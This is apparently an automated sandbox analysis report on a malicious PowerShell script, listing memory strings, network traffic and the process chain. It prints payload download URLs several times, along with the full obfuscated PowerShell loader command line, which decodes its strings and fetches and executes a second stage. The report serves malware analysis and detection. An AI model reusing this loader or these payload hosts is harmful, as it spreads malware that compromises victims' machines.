          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.s
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A573B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.in
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Su
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sub
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subo
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subor
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subord
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordi
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordin
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordine
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordiner
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinere
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordineren
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerend
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerende
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes7
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.s
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A573B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E376F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E376F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rfk6quirfk6d%20itfk6ms%20and%20sfk6rvicfk6s.pdf
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinfk6applfk6tfk6ch.afk6/na/mg.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.6:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.6:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.6:49763 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B3EFA0_2_00007FFD348B3EFA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B2FFA0_2_00007FFD348B2FFA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B61610_2_00007FFD348B6161
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A40FA6_2_00007FFD348A40FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A3DFA6_2_00007FFD348A3DFA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A3DDD6_2_00007FFD348A3DDD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A495D6_2_00007FFD348A495D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A72FC6_2_00007FFD348A72FC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A4FFB6_2_00007FFD348A4FFB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A57F26_2_00007FFD348A57F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A800A6_2_00007FFD348A800A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A10006_2_00007FFD348A1000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348A3F9D6_2_00007FFD348A3F9D
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amcr0lqo.h4x.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: ky.ps1ReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
